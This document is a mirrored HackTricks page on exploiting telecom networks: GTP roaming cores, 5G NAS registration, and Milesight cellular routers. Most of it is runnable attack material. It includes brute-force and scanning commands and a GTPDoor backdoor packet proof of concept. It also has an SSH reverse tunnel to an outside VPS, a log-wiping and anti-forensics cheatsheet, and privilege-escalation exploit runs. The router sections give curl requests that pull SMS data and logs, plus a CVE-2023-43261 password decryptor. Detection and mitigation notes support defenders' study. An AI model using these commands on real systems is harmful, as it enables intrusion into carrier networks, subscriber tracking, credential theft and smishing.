maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md

338 lines
15 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Mobile-core protocols (GPRS Tunnelling Protocol GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.
## 1. Recon & Initial Access
### 1.1 Default OSS / NE Accounts
A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … A dedicated wordlist dramatically increases brute-force success:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below).
### 1.2 Host Discovery inside GRX/IPX
Most GRX operators still allow **ICMP echo** across the backbone. Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Enumerating Subscribers `cordscan`
The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses. Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscribers visited PLMN.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Key flags:
- `--imsi` Target subscriber IMSI
- `--oper` Home / HNI (MCC+MNC)
- `-w` Write raw packets to pcap
Important constants inside the binary can be patched to widen scans:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Code Execution over GTP `GTPDoor`
`GTPDoor` is a tiny ELF service that **binds UDP 2123 and parses every incoming GTP-C packet**. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`. The stdout/stderr are exfiltrated inside **Echo Response** messages so that no outward session is ever created.
Minimal PoC packet (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Detection:
* any host sending **unbalanced Echo Requests** to SGSN IPs
* GTP version flag set to 1 while message type = 1 (Echo) deviation from spec
## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` ships an SGSN emulator able to **establish a PDP context towards a real GGSN/PGW**. Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
```
With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the **data plane**.
### 4.2 SSH Reverse Tunnel over Port 53
DNS is almost always open in roaming infrastructures. Expose an internal SSH service to your VPS listening on :53 and return later from home:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Check that `GatewayPorts yes` is enabled on the VPS.
## 5. Covert Channels
| Channel | Transport | Decoding | Notes |
|---------|-----------|----------|-------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches for `*.nodep` sub-domain |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter |
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
## 6. Defense Evasion Cheatsheet
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup # hide from top/htop
printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux
```
## 7. Privilege Escalation on Legacy NE
```bash
# DirtyCow CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py
```
Clean-up tip:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Tool Box
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` custom tooling described in previous sections.
* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
* `FRP` (≥0.37) : NAT traversal / asset bridging
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
The 5G registration procedure runs over NAS (Non-Access Stratum) on top of NGAP. Until NAS security is activated by Security Mode Command/Complete, initial messages are unauthenticated and unencrypted. This pre-security window enables multiple attack paths when you can observe or tamper with N2 traffic (e.g., on-path inside the core, rogue gNB, or testbed).
Registration flow (simplified):
- Registration Request: UE sends SUCI (encrypted SUPI) and capabilities.
- Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*.
- Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
- PDU Session Establishment: IP/QoS setup.
Lab setup tips (non-RF):
- Core: Open5GS default deployment is sufficient to reproduce flows.
- UE: simulator or test UE; decode using Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Useful display filters in Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI
Expected: UE/USIM must transmit SUCI (SUPI encrypted with the home-network public key). Finding a plaintext SUPI/IMSI in the Registration Request indicates a privacy defect enabling persistent subscriber tracking.
How to test:
- Capture the first NAS message in InitialUEMessage and inspect the Mobile Identity IE.
- Wireshark quick checks:
- It should decode as SUCI, not IMSI.
- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should exist; absence plus presence of `imsi` indicates leakage.
What to collect:
- MCC/MNC/MSIN if exposed; log per-UE and track across time/locations.
Mitigation:
- Enforce SUCI-only UEs/USIMs; alert on any IMSI/SUPI in initial NAS.
### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)
Background:
- UE advertises supported EEA (encryption) and EIA (integrity) in the UE Security Capability IE of the Registration Request.
- Common mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 are null algorithms.
Issue:
- Because the Registration Request is not integrity protected, an on-path attacker can clear capability bits to coerce selection of EEA0/EIA0 later during Security Mode Command. Some stacks wrongly allow null algorithms outside emergency services.
Offensive steps:
- Intercept InitialUEMessage and modify the NAS UE Security Capability to advertise only EEA0/EIA0.
- With Sni5Gect, hook the NAS message and patch the capability bits before forwarding.
- Observe whether AMF accepts null ciphers/integrity and completes Security Mode with EEA0/EIA0.
Verification/visibility:
- In Wireshark, confirm selected algorithms after Security Mode Command/Complete.
- Example passive sniffer output:
```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```
Mitigations (must):
- Configure AMF/policy to reject EEA0/EIA0 except where strictly mandated (e.g., emergency calls).
- Prefer enforcing EEA2/EIA2 at minimum; log and alarm on any NAS security context that negotiates null algorithms.
### 9.3 Replay of initial Registration Request (pre-security NAS)
Because initial NAS lacks integrity and freshness, captured InitialUEMessage+Registration Request can be replayed to AMF.
PoC rule for 5GReplay to forward matching replays:
```xml
<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">
<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>
<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
```
What to observe:
- Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.
Mitigations:
- Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.
### 9.4 Tooling pointers (reproducible)
- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
- Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.
### 9.5 Defensive checklist
- Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
- Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
- Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
- Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
---
## 10. Industrial Cellular Routers Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPCstyle endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
Typical unauthenticated requests (same structure for inbox/outbox):
```http
POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json
```
```json
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
```
Responses include fields such as `timestamp`, `content`, `phone_number` (E.164), and `status` (`success` or `failed`). Repeated `failed` sends to the same number are often attacker “capability checks” to validate that a router/SIM can deliver before blasting.
Example curl to exfiltrate SMS metadata:
```bash
curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
```
Notes on auth artifacts:
- Some traffic may include an auth cookie, but a large fraction of exposed devices respond without any authentication to `query_inbox`/`query_outbox` when the management interface is Internet-facing.
- In environments requiring auth, previously-leaked credentials (see below) restore access.
Credential recovery path CVE-2023-43261:
- Affected families: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
- Issue: web-served logs (e.g., `httpd.log`) are reachable unauthenticated under `/lang/log/` and contain admin login events with the password encrypted using a hardcoded AES key/IV present in client-side JavaScript.
- Practical access and decrypt:
```bash
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}
```
Minimal Python to decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
```python
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...' # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
```
Hunting and detection ideas (network):
- Alert on unauthenticated `POST /cgi` whose JSON body contains `base`/`function` set to `query_inbox` or `query_outbox`.
- Track repeated `POST /cgi` bursts followed by `status":"failed"` entries across many unique numbers from the same source IP (capability testing).
- Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends.
Shodan/OSINT pivots (examples seen in the wild):
- `http.html:"rt_title"` matches Milesight router panels.
- Google dorking for exposed logs: `"/lang/log/system" ext:log`.
Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale.
---
## Detection Ideas
1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
3. **Frequent Echo Requests without corresponding Echo Responses** might indicate GTPDoor beacons.
4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**.
5. 5G: **InitialUEMessage carrying NAS Registration Requests repeated from identical endpoints** (replay signal).
6. 5G: **NAS Security Mode negotiating EEA0/EIA0** outside emergency contexts.
## References
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 GTPv2-C (v17.6.0)
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
- 3GPP TS 24.501 Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 Security architecture and procedures for 5G System
- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
- [CVE-2023-43261 NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink